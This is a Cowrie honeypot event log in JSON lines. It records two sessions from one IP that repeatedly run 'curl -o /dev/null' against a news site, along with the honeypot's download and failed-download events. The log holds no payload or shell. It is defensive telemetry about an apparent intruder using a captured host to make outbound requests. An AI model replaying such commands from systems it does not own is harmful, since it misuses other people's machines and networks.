{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.344844Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.351182Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.367785Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.369079Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.380505Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.381737Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.405610Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.406983Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.423959Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.425125Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.458324Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.459429Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.481831Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.483105Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.494031Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.521303Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.522724Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.539605Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.540750Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.556532Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.571602Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.574608Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.575920Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.579980Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.594228Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.595526Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.615033Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.629942Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.631043Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.639176Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.640530Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.650316Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.667239Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.675973Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.677084Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.683901Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.684878Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.728763Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.730312Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.734164Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.735913Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.738937Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.780383Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.781903Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.788796Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.790100Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.826775Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.828222Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.834212Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.835747Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.874313Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.876163Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.879433Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.880845Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.921191Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.922445Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.925261Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.926536Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.989481Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.991167Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.995372Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.996772Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.032262Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.039269Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.040487Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.042795Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.043829Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.081923Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.083182Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.085319Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.086477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.121867Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.148835Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.171657Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.204742Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.223178Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.236858Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.238074Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.243284Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.244954Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.260041Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.274449Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.275773Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.282564Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.283650Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.306496Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.315336Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.316565Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.325949Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.327052Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.344200Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.355253Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.356808Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.365562Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.366789Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.393800Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.395133Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.404133Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.405123Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.432627Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.437666Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.438893Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.440425Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.447049Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.448237Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.462383Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.485118Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.486440Z","src_ip":"212.227.125.160","session":"7541ed730449"}
